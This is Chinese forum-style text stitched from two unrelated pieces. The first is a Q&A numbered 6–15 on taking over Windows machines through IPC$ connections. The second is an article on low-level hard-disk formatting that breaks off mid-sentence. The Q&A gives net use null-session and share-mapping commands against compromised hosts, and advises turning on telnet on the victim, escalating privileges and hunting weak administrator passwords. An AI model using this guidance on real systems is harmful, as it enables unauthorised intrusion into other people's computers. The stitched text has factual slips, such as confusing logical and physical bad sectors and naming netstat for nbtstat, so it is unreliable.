6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办? 答:不能copy文件有多个可能,除了权限不够外,还可能是对方c$,d$等默认管理共享没开,或者是对方为NTFS文件格式,通过设置,管理员也未必能远程写文件。既然你有管理员权限,那就开telnet上去吧,然后在开它的共享。 7.我用Win98能与对方建立ipc$连接吗? 答:不可以的,要进行ipc$的操作,建议用win2000 8.我用net use \\ip\ipc$ && /user &&成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么? 答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;或者你自己的NBT没有打开,netstat是建立在NBT之上的。 9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事? 答:呵呵,这说明你与目标主机建立了一个以上的ipc$连接,这是不允许的,把其他的删掉吧:net use \\*.*.*.*\ipc$ /del 10.我在映射的时候出现: F:\&net use h: \\211.161.134.*\e$ 系统发生 85 错误。 本地设备名已在使用中。这是怎么回事? 答:你也太粗心了吧,这说明你的h盘正在使用,映射到别的盘符吧! 11.我建立了一个连接f:\&net use \\*.*.*.*\ipc$ &123& /user:&ccbirds& 成功了,但当我映射时出现了错误,向我要密码,怎么回事? F:\&net use h: \\*.*.*.*\c$ 密码在 \\*.*.*.*\c$ 无效。 请键入 \\*.*.*.*\c$ 的密码: 系统发生 5 错误。 拒绝访问。 答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。 12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢? 答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享. 13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么? 答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。 14.我用net use \\192.168.0.2\ipc$ &password& /user:&administrator& 成功,可是 net use i: \\192.168.0.2\c 出现请键入 \\192.168.0.2 的密码,怎么回事情呢? 答:虽然你具有管理员权限,但管理员在设置c盘共享权限时可能并未设置允许administrator访问,所以会出现问题。 15.如果自己的机器禁止了ipc$, 是不是还可以用ipc连接别的机器? 答:可以的。
是不是听好多人说低格低格的啊????? 手把手教你如何进行硬盘低级格式化 1。硬盘低级格式化的功用 硬盘低格格式化是对硬盘最彻底的初始化方式,经过低格后的硬盘,原来保护的数据将全部丢失,所以一般来说低格硬盘是非常不可取的,只有非常必要的时候才能低格硬盘。而这个所谓的必要时候有两种,一是硬盘出厂前,硬盘厂会对硬盘进行一次低级格式化;另一个是当硬盘出现某种类型的坏道时,使用低级格式化能起到一定的缓解或者屏蔽作用。 对于第一种情况,这里不用多说了,因为硬盘出厂前的低格工作只有硬盘工程师们才会接触到,对于普通用户而言,根本无须考虑这方面的事情。至于第二种情况,是什么类型的坏道时才需要低格呢?在说明这个关键性问题前,先来看看硬盘坏道的类型。 总的来说,坏道可以分为物理坏道和逻辑坏道。其中逻辑坏道相对比较容易解决,它指硬盘在写入时受到意久干扰,造成有ECC错误。从过程上讲,它是指硬盘在写入数据的时候,会用ECC的逻辑重新组合数据,一般操作系统要写入512个字节,但实际上硬盘会多写几十个字节,而且所有的这些字节都要用ECC进行校验编码,如果原始字节算出的ECC校正码和读出字节算出的ECC不同,这样就会产生ECC错误,这就是所谓的物理坏道产生原因。至于物理坏道,它对硬盘的损坏更具致命性,它也有软性和硬性物理坏道的区别,磁盘表面物理损坏就是硬性的,这是无法修复的。而由于外界影响而造成数据的写入错误时,系统也会认为是物理坏道,而这种物理坏道是可以使用一些硬盘工具(例如硬盘厂商提供的检测修复软件)来修复,此外,对于微小的硬盘表面损伤,一些硬盘工具(例如西部数据的Data Lifeguard Tools)就可以重新定向到一个好的保留扇区来修正错误。 对于这些坏道类型,硬性的物理坏道肯定是无法修复的,它是对硬盘表面的一种最直接的损坏,所以即使再低格或者使用硬盘工具也无法修复(除非是非常微小的损坏,部份工具可以将这部份坏道保留不用以此达到解决目的)。对于硬盘上出现逻辑坏道或者软性物理坏道,用户可以试试使用低级格式化来达到屏蔽坏道的作用,但这里需要指出,屏蔽坏道并不等于消除坏道了,低格硬盘能把原来硬盘内所有分区都删除,但坏道却依然存在,屏蔽只是将坏道隐藏起来,不让用户在存储数据时使用这些坏道,这样能在一定程度上保证用户数据的可靠性,但坏道却会随着硬盘分区、格式化次数的增长
